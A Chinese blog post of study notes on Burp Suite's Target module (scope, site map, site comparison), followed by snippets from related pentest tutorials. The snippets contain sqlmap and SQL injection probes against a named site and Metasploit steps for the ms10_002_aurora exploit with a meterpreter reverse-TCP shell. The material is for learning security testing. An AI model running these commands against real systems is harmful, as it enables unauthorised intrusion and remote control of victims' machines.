Brup Suite 渗透测试笔记(三)

接上次笔记

一、对BurpSuite Target的功能吧组件主要用 站点地图(SiteMap),目标域设置(TargetScope),Target工具三部分组成

1、这里先说明Scope的作用,

限制站点地图和Proxy的历史内容的显示结果,设置Burp Proxy拦截请求,BurpSpider抓取那些内容,Burp Scanner自动扫描那些作用域的安全漏洞,在Burp intruder和Burp Repeater中指定URL,通过Target Scope可以方便的控制Burp的拦截功能,拦截范围,操作对象,减少噪音,这个版块中主要包括两个功能,允许规则和删除规则。其中允许视为操作允许,有效,相反,去除则表示不会拦截。

从图上可以看出拦截规则主要包括协议,域名或端口,文件名。也就是说,我们可以从协议、域名、IP地址、端口、文件名四个维度去控制那些消息出现在允许或者去除的列表中。当我们设置了TargetScope为默认的时,Burp Proxy会进行拦截代理,Burp会将浏览信息记录下来,包含每一个请求和应答的详细信息保存到站点地图。

2、SiteMap的功能介绍

从下图可以看出Sitemap的左边为访问的URL,按照网站的层级和深度,树形的展示整个应用系统的结构,和其相关的其他域和URl的情况。窗口右是某个URl的被访问的明细列表,基于左边的树形结构可以选择一个分支,对指定的分支进行扫描和抓取。或者添加到TargetScope中

3、Target工具的使用

Target工具主要包括了手工获取站点的地图,站点的比较,攻击面对分析

这里详细说明一下手功能获取站点地图的必要性,操作步骤如下:

第一: 设置浏览器的代理和Burp Proxy代理,能正常工作,

第二:关闭Burp Proxy拦截功能

第三:手动浏览网页,这时Target会自动记录战低的地图,(手工获取的好处是根据自己的需要和分析自动的控制访问的内容,记录的信息比较准确,但是花的时间更长,)站点比较是一个Burp提供给渗透测试人员对站点进行动态分析的利器,通过比较发现账号权限之间的差异,下面进行站点比较

对上面再做个详细的说明,通过比较map1 和map2 的消息的差异,包含请求消息和应答消息。

4、analysis Target工具分析

5、今天就先写到这 2018年1月19号22::14

原文地址:https://www.cnblogs.com/xinxianquan/p/8319063.html

时间: 2024-08-02 14:02:31

Brup Suite 渗透测试笔记(三)的相关文章

Brup Suite 渗透测试笔记(二)

接上次笔记 1.浏览器配置完后在地址栏中输入http://brup出现官网 其他的浏览器火狐,Google Chrome,306极速浏览器,IE等设置基本类似,这里不再做赘述. 2.配置好之后启动intercept(拦截)使得intercept is on 开启,进行数据拦截 3打开浏览器输入www.baidu.com ,数据流量进过burpsuite 点击forward数据会继续传下去,点击drop数据舍弃 Raw是web请求的raw格式的视图,包括啦请求地址,http协议版本,主机头,浏览器

Brup Suite 渗透测试笔记(四)

接上次笔记(今天感觉好空虚啊,给老师找了一下午的资料,做书的排版,电脑试装了很多文档格式转换软件,感觉电脑快要瘫痪了,到晚上就头晕晕的) 今天主要做BurpSuite的spider的功能区的学习笔记, 一.Spider主要分两个部分,一个是Control 另一个是OPtions,BurpSpider的功能其实主要是用在大型额系统测试,能过在短时间内完成体统结构的分析,先看的控制功能 1.control是由两部分组成,状态和控制域,其中状态(Spider Status)能够显示当前的进度,传输情况

Brup Suite 渗透测试笔记(八)

续上次笔记 1.之前记到payload类型的用户名生成器,(username  generator).这种类型发payload只要用于用户名和email账号的自动生成. 2.ECB加密块洗牌(ECB block shufffler)这种类型的payload是基于ECB加密模式的payload生成器,ECB加密模式中每组64位的数据之间相互独立,通过改变分组数据的位置方式来验证应用程序是否受到攻击. 3.Burp payload生成插件(Extension -generated)这种类型的payl

Brup Suite 渗透测试笔记(一)

收集的资料整理如下: http://www.nxadmin.com/啊德玛web安全网站 功能介绍: 1.作为代理,默认端口设置8080上运行,截获修改客户端到web应用程序的数据包 2.spider 爬网,,抓取web应用程序的链接内容,自动提交表单(用户自定义设置), 3.scanner扫描器 (商业版开放开放)自动测试漏洞,但是可能误报,扫描结果不是很准 4.intruder 入侵模块,多种用途,利用web漏洞进行web应用程序的模糊测试,暴力破解 5.repeater 中继器,格根据不同

Brup Suite 渗透测试笔记(六)

接上次笔记这章记payload的类型分类做一说明: 1.simplelist是一个简单的payload类型,通过配置一个字符串作为payload,也可以手动添加字符串列表. 2.运行文件 Runtime file ----指定文件,作为对应的payload位置上的payload列表,下方的payload options将自动添加改变为文件选择按钮和输入框,指定后BurpIntruder 将读取文件的每一行作为一个payload 3.自定义迭代器(Custom iterator)一共有八个占位,每

基础渗透测试笔记三

sqlmap -u "http://www.vuln.cn/post.php?id=1" 默认使用level1检测全部数据库类型 sqlmap -u "http://www.vuln.cn/post.php?id=1"  --dbms mysql --level 3 指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面) 跟随302跳转 当注入页面错误的时候,自动跳转到另一个页面的时候需要跟随302, 当注入错误的时候,先报错再跳转的时候,不需要跟随3

基础渗透测试笔记续三

变量覆盖漏洞: 产生:变量如果没有初始化,而且能被用户控制, 在php中,若register_globals为on(启用)时非常严重 此为全局变量覆盖漏洞 代码: <?php $x="xxx"; $y="seven"; echon $x; echon "<hr>"; echon $y; echon "<hr>"; $y=$_GET["x"]; echon $y ?> 下载

基础渗透测试笔记二

xss跨站漏洞纯手打笔记(基础) XSS漏洞扫描 常用工具: wvs 椰树 safe3 Xelenium w3af vega xss扫描插件+burp Beef: beef+msf拿客户端shell(ie6 xp) use windows/browser/ms10_002_aurora set PAYLOAD windows/meterpreter/reverse_tvp PAYLOAD =>wondows/meterpreter/reverse_tcp set SRVHOST (my ip)

基础渗透测试笔记一

1.access数据库 数据库后缀名:*.mdb 打开数据库工具: 破障浏览器  辅臣数据库浏览器. access注入>判断注入点> '报错  and 1=1返回正常  and 1=2返回错误  or 1=1正 常   or 1=2返回错误  an 1=23错误 返回错误存在注入漏洞 获取基本信息: and 1=cast(version()as int) 获取数据库版本信息系统信息 and 1=cast(user||123 as int)获取当前用户名称 postgres用户相当于root用户